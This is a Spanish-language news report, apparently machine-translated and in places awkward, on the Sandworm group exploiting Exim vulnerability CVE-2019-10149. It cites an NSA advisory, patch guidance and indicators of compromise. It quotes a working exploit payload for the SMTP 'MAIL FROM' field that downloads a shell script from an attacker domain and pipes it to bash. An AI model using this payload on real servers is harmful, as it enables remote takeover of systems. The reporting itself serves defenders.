abril 16, 2021

Los hackers rusos están explotando errores que dan el control de los servidores de EE. UU.

Foto estilizada de la computadora de escritorio.

Un grupo de piratas informáticos ruso vinculado a los ataques a la red eléctrica en Ucrania, el gusano de destrucción de datos más destructivo del mundo y otras operaciones malvadas del Kremlin está explotando una vulnerabilidad que le permite tomar el control de las computadoras administradas por el gobierno de los Estados Unidos y de sus socios.

En un aviso publicado el jueves, la Agencia de Seguridad Nacional de EE. UU. Dijo que el grupo Sandworm estaba explotando activamente una vulnerabilidad en Exim, un agente de transferencia de correo de código abierto o MTA, para sistemas operativos basados ​​en Unix. Rastreado como CVE-2019-10149, el error crítico permite que un usuario remoto no autenticado envíe correos electrónicos especialmente diseñados que ejecutan comandos con privilegios de root. Con esto, el atacante puede instalar programas de su elección, modificar los datos y crear nuevas cuentas.

Un parche CVE-2019-10149 ha estado disponible desde junio. Los ataques han estado funcionando desde al menos agosto. Los funcionarios de la NSA escribieron:

Los actores explotaron a las víctimas utilizando el software Exim en su MTA frontal enviando un comando en el campo «CORREO DESDE» de un mensaje de Protocolo simple de transferencia de correo (SMTP). A continuación se muestra un ejemplo, que contiene parámetros que el actor debe modificar para su distribución.

MAILFROM:<${run{x2Fbinx2Fshtctx22execx20x2Fusrx2Fbinx2Fwgetx20x2DOx20x2Dx20http:x2Fx2Fhostapp.bex2Fscript1.shx20x7C x20bashx22}}@hostapp.be>
Hex decoded command:
/bin/sh -c "exec /usr/bin/wget -O - http://hostapp.be/script1.sh | bash"

Figura 1: Ejemplo del comando de control «CORREO DESDE»

Cuando CVE-2019-10149 se explota con éxito, un actor puede ejecutar el código de su elección. Cuando Sandworm explotó CVE-2019-10149, la máquina víctima descargó y posteriormente ejecutó un script de shell desde un dominio controlado por Sandworm. Este script intentaría realizar las siguientes operaciones en la máquina víctima: agregar usuarios con privilegios desactiva la configuración de seguridad de la red, actualiza las configuraciones SSH para permitir el acceso remoto adicional, ejecuta un script adicional para permitir la explotación posterior.

El aviso del jueves dijo que los piratas informáticos trabajaban para una unidad específica, conocida como el Centro Principal de Tecnologías Especiales, que es parte del GRU, o la dirección principal de la inteligencia rusa. Existe un acuerdo general entre los investigadores de seguridad de que el grupo de hackers que trabajan en nombre de esta unidad ha sido responsable de algunos de los ciberataques más ambiciosos y destructivos de los últimos años.

Ejemplos incluidos:

El periodista por cable Andy Greenberg publicó recientemente gusano de arena, un libro sobre hacks y las tensiones geopolíticas que explotan.

El error del servidor de correo Exim apareció en junio pasado, mientras que los desarrolladores lanzaron un parche de seguridad. El aviso afirmaba que los ataques remotos generalmente requieren que los sistemas vulnerables ya no se ejecuten con la configuración predeterminada. Sin embargo, en un caso, los ataques remotos contra sistemas predefinidos fueron posibles cuando un atacante mantuvo una conexión al servidor vulnerable abierta durante siete días transmitiendo un byte cada pocos minutos.

El aviso del jueves no indicó cuántos servidores fueron apuntados con éxito o las áreas geográficas o industrias en las que se encuentran. Sin embargo, la NSA generalmente no emite este tipo de alerta a menos que haya motivos de preocupación.

Las personas a cargo de los servidores Exim deben verificar que estén ejecutando la versión 4.92 o posterior. Y con gran precaución, los administradores también deben verificar los registros del sistema para las conexiones a 95.216.13.196, 103.94.157.5 y hostapp.be, que están todos vinculados a la campaña en curso de Sandworm.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *